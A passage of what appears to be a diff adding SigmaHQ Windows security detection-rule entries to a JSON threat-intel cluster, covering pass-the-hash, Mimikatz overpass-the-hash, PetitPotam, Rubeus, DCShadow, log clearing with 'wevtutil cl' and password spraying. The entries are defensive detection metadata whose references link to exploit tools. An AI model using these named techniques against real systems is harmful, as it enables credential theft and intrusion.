"win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" + ] + }, + "uuid": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", + "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security" + }, + { + "description": "Detects NetNTLM downgrade attack", + "meta": { + "author": "Florian Roth, wagga", + "creation_date": "2018/03/20", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_net_ntlm_downgrade.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_ntlm_downgrade.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" + ] + }, + "uuid": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", + "value": "NetNTLM Downgrade Attack" + }, + { + "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. 
renaming files) without changing them on disk.", + "meta": { + "author": "Tim Shelton (HAWK.IO)", + "creation_date": "2021/12/06", + "falsepositive": [ + "Read only access list authority" + ], + "filename": "win_security_net_share_obj_susp_desktop_ini.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.009" + ] + }, + "uuid": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", + "value": "Windows Network Access Suspicious desktop.ini Action" + }, + { + "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", + "meta": { + "author": "Ilyas Ochkov, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "cfeed607-6aa4-4bbd-9627-b637deb723c8", + "value": "New or Renamed User Account with '$' in Attribute 'SamAccountName'" + }, + { + "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", + "meta": { + "author": "Pushkarev Dmitry", + "creation_date": "2020/06/27", + "falsepositive": [ + "Valid user was not added to RDP group" + ], + "filename": 
"win_security_not_allowed_rdp_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_not_allowed_rdp_access.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.001" + ] + }, + "uuid": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", + "value": "Denied Access To Remote Desktop" + }, + { + "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", + "meta": { + "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", + "creation_date": "2018/02/12", + "falsepositive": [ + "Runas command-line tool using /netonly parameter" + ], + "filename": "win_security_overpass_the_hash.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://cyberwardog.blogspot.de/2017/04/chronicles-of-threat-hunter-hunting-for.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_overpass_the_hash.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.s0002", + "attack.t1550.002" + ] + }, + "uuid": "192a0330-c20b-4356-90b6-7b7049ae0b87", + "value": "Successful Overpass the Hash Attempt" + }, + { + "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", + "meta": { + "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", + "creation_date": "2019/06/14", + "falsepositive": [ + "Administrator activity" + ], + "filename": "win_security_pass_the_hash_2.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events", + "https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis", + "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_pass_the_hash_2.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1550.002" + ] + }, + "uuid": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", + "value": "Pass the Hash Activity 2" + }, + { + "description": "Detect PetitPotam coerced authentication activity.", + "meta": { + "author": "Mauricio Velazco, Michael Haag", + "creation_date": "2021/09/02", + "falsepositive": [ + "Unknown. Feedback welcomed." + ], + "filename": "win_security_petitpotam_network_share.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/topotam/PetitPotam", + "https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_network_share.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1187" + ] + }, + "uuid": "1ce8c8a3-2723-48ed-8246-906ac91061a6", + "value": "Possible PetitPotam Coerce Authentication Attempt" + }, + { + "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller 
computer accounts.\n", + "meta": { + "author": "Mauricio Velazco, Michael Haag", + "creation_date": "2021/09/02", + "falsepositive": [ + "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." + ], + "filename": "win_security_petitpotam_susp_tgt_request.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/topotam/PetitPotam", + "https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/", + "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1187" + ] + }, + "uuid": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "value": "PetitPotam Suspicious Kerberos TGT Request" + }, + { + "description": "Detects DCShadow via create new SPN", + "meta": { + "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", + "creation_date": "2019/10/25", + "falsepositive": [ + "Valid on domain controllers; exclude known DCs" + ], + "filename": "win_security_possible_dc_shadow.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/blob/ec5bb710499caae6667c7f7311ca9e92c03b9039/rules/windows/builtin/win_dcsync.yml", + "https://twitter.com/gentilkiwi/status/1003236624925413376", + "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", + "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_possible_dc_shadow.yml" + ], + "tags": [ + 
"attack.credential_access", + "attack.t1207" + ] + }, + "uuid": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", + "value": "Possible DC Shadow Attack" + }, + { + "description": "Detects powershell script installed as a Service", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_powershell_script_installed_as_service.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_powershell_script_installed_as_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "2a926e6a-4b81-4011-8a96-e36cc8c04302", + "value": "PowerShell Scripts Installed as Services - Security" + }, + { + "description": "Detects access to a protected_storage service over the network. 
Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/10", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_protected_storage_service_access.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_protected_storage_service_access.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "45545954-4016-43c6-855e-eae8f1c369dc", + "value": "Protected Storage Service Access" + }, + { + "description": "Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/23", + "falsepositive": [ + "Software installation", + "Software updates" + ], + "filename": "win_security_rare_schtasks_creations.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rare_schtasks_creations.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "car.2013-08-001", + "attack.t1053.005" + ] + }, + "uuid": "b0d77106-7bb0-41fe-bd94-d1752164d066", + "value": "Rare Schtasks Creations" + }, + { + "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", + "meta": { + "author": "Florian Roth (rule), Adam Bradbury (idea)", + "creation_date": "2019/06/02", + "falsepositive": [ + "Unlikely" + ], + "filename": 
"win_security_rdp_bluekeep_poc_scanner.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/AdamTheAnalyst/status/1134394070045003776", + "https://github.com/zerosum0x0/CVE-2019-0708", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_bluekeep_poc_scanner.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" + ] + }, + "uuid": "8400629e-79a9-4737-b387-5db940ab2367", + "value": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln" + }, + { + "description": "RDP login with localhost source address may be a tunnelled login", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/01/28", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_rdp_localhost_login.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_localhost_login.yml" + ], + "tags": [ + "attack.lateral_movement", + "car.2013-07-002", + "attack.t1021.001" + ] + }, + "uuid": "51e33403-2a37-4d66-a574-1fda1782cc31", + "value": "RDP Login from Localhost" + }, + { + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/02/16", + "falsepositive": [ + "Programs that connect locally to the RDP port" + ], + "filename": "win_security_rdp_reverse_tunnel.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1096148422984384514", + 
"https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_reverse_tunnel.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1090.001", + "attack.t1090.002", + "attack.t1021.001", + "car.2013-07-002" + ] + }, + "uuid": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "value": "RDP over Reverse SSH Tunnel WFP" + }, + { + "description": "Detects potential use of Rubeus via registered new trusted logon process", + "meta": { + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_register_new_logon_process_by_rubeus.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_register_new_logon_process_by_rubeus.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" + ] + }, + "uuid": "12e6d621-194f-4f59-90cc-1959e21e69f7", + "value": "Register new Logon Process by Rubeus" + }, + { + "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/09/12", + "falsepositive": [ + "Legitimate use of remote PowerShell execution" + ], + "filename": "win_security_remote_powershell_session.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + 
"https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_remote_powershell_session.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "13acf386-b8c6-4fe0-9a6e-c4756b974698", + "value": "Remote PowerShell Sessions Network Connections (WinRM)" + }, + { + "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", + "meta": { + "author": "frack113", + "creation_date": "2022/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_replay_attack_detected.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_replay_attack_detected.yml" + ], + "tags": "No established tags" + }, + "uuid": "5a44727c-3b85-4713-8c44-4401d5499629", + "value": "Replay Attack Detected" + }, + { + "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/22", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@mvelazco/hunting-for-samaccountname-spoofing-cve-2021-42287-and-domain-controller-impersonation-f704513c8a45", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_samaccountname_spoofing_cve_2021_42287.yml" + ], + "tags": "No established tags" + }, + "uuid": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", + "value": "Suspicious Computer Account Name Change CVE-2021-42287" + }, + { + "description": "Detects handles requested to SAM registry hive", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_sam_registry_hive_handle_request.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190725024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sam_registry_hive_handle_request.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012", + "attack.credential_access", + "attack.t1552.002" + ] + }, + "uuid": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", + "value": "SAM Registry Hive Handle Request" + }, + { + "description": "Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. 
\\TASKNAME", + "meta": { + "author": "David Strassegger, Tim Shelton", + "creation_date": "2021/01/22", + "falsepositive": [ + "Software installation" + ], + "filename": "win_security_scheduled_task_deletion.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/matthewdunwoody/status/1352356685982146562", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scheduled_task_deletion.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "car.2013-08-001", + "attack.t1053.005" + ] + }, + "uuid": "4f86b304-3e02-40e3-aa5d-e88a167c9617", + "value": "Scheduled Task Deletion" + }, + { + "description": "Detects non-system users failing to get a handle of the SCM database.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_scm_database_handle_failure.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_handle_failure.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1010" + ] + }, + "uuid": "13addce7-47b2-4ca0-a98f-1de964d1d669", + "value": "SCM Database Handle Failure" + }, + { + "description": "Detects non-system users performing privileged operation os the SCM database", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "creation_date": "2019/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_scm_database_privileged_operation.yml", + "level": "medium", + "logsource.category": "No established category", + 
"logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_privileged_operation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "dae8171c-5ec6-4396-b210-8466585b53e9", + "value": "SCM Database Privileged Operation" + }, + { + "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/09/02", + "falsepositive": [ + "SCCM" + ], + "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scrcons_remote_wmi_scripteventconsumer.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" + ] + }, + "uuid": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "value": "Remote WMI ActiveScriptEventConsumers" + }, + { + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_service_installation_by_unusal_client.yml", + "level": "high", + "logsource.category": "security", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", + "https://twitter.com/SBousseaden/status/1490608838701166596", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_service_installation_by_unusal_client.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ] + }, + "uuid": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", + "value": "Service Installed By Unusual Client - Security" + }, + { + "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", + "meta": { + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "creation_date": "2020/08/06", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_smb_file_creation_admin_shares.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml", + "https://securitydatasets.com/notebooks/small/windows/08_lateral_movement/SDWIN-200806015757.html?highlight=create%20file", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_smb_file_creation_admin_shares.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "b210394c-ba12-4f89-9117-44a2464b9511", + "value": "SMB Create Remote File Admin Share" + }, + { + "description": "Addition of domains is seldom and should be verified for legitimacy.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/12/03", + "falsepositive": [ + "Legitimate extension of domain structure" + ], + "filename": "win_security_susp_add_domain_trust.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_domain_trust.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": 
"0255a820-e564-4e40-af2b-6ac61160335c", + "value": "Addition of Domain Trusts" + }, + { + "description": "An attacker can use the SID history attribute to gain additional privileges.", + "meta": { + "author": "Thomas Patzke, @atc_project (improvements)", + "creation_date": "2017/02/19", + "falsepositive": [ + "Migration of an account into a new domain" + ], + "filename": "win_security_susp_add_sid_history.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=1772", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_sid_history.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1134.005" + ] + }, + "uuid": "2632954e-db1c-49cb-9936-67d1ef1d17d2", + "value": "Addition of SID History to Active Directory Object" + }, + { + "description": "Code integrity failures may indicate tampered executables.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/12/03", + "falsepositive": [ + "Disk device errors" + ], + "filename": "win_security_susp_codeintegrity_check_failure.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_codeintegrity_check_failure.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.001" + ] + }, + "uuid": "470ec5fa-7b4e-4071-b200-4c753100f49b", + "value": "Failed Code Integrity Checks" + }, + { + "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", + "meta": { + "author": "elhoim", + "creation_date": "2022/09/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_computer_name.yml", + "level": "critical", + "logsource.category": "security", + "logsource.product": "windows", + "refs": [ + 
"https://twitter.com/malmoeb/status/1511760068743766026", + "https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py", + "https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_computer_name.yml" + ], + "tags": [ + "cve.2021.42278", + "cve.2021.42287", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" + ] + }, + "uuid": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "value": "Win Susp Computer Name Containing Samtheadmin" + }, + { + "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/02/19", + "falsepositive": [ + "Initial installation of a domain controller" + ], + "filename": "win_security_susp_dsrm_password_change.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=1714", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_dsrm_password_change.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", + "value": "Password Change on Directory Service Restore Mode (DSRM) Account" + }, + { + "description": "One of the Windows Eventlogs has been cleared. e.g. 
caused by \"wevtutil cl\" command execution", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/01/10", + "falsepositive": [ + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" + ], + "filename": "win_security_susp_eventlog_cleared.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/deviouspolack/status/832535435960209408", + "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_eventlog_cleared.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" + ] + }, + "uuid": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "value": "Security Eventlog Cleared" + }, + { + "description": "Detects a source user failing to authenticate with multiple users using explicit credentials on a host.", + "meta": { + "author": "Mauricio Velazco", + "creation_date": "2021/06/01", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_logons_explicit_credentials.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_explicit_credentials.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "196a29c2-e378-48d8-ba07-8a9e61f7fab9", + "value": "Multiple Users Attempting To 
Authenticate Using Explicit Credentials" + }, + { + "description": "Detects failed logins with multiple accounts from a single process on the system.", + "meta": { + "author": "Mauricio Velazco", + "creation_date": "2021/06/01", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_logons_single_process.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://www.trimarcsecurity.com/single-post/2018/05/06/trimarc-research-detecting-password-spraying-with-security-event-auditing", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_process.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "fe563ab6-ded4-4916-b49f-a3a8445fe280", + "value": "Multiple Users Failing to Authenticate from Single Process" + }, + { + "description": "Detects suspicious failed logins with different user accounts from a single source system", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/01/10", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_logons_single_source.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" + ] + }, + "uuid": 
"e98374a6-e2d9-4076-9b5c-11bdb2569995", + "value": "Failed Logins with Different Accounts from Single Source System" + }, + { + "description": "Detects suspicious failed logins with different user accounts from a single source system", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/01/10", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_logons_single_source2.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source2.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" + ] + }, + "uuid": "6309ffc4-8fa2-47cf-96b8-a2f72e58e538", + "value": "Failed NTLM Logins with Different Accounts from Single Source System" + }, + { + "description": "Detects multiple failed logins with multiple valid domain accounts from a single source system using the Kerberos protocol.", + "meta": { + "author": "Mauricio Velazco, frack113", + "creation_date": "2021/06/01", + 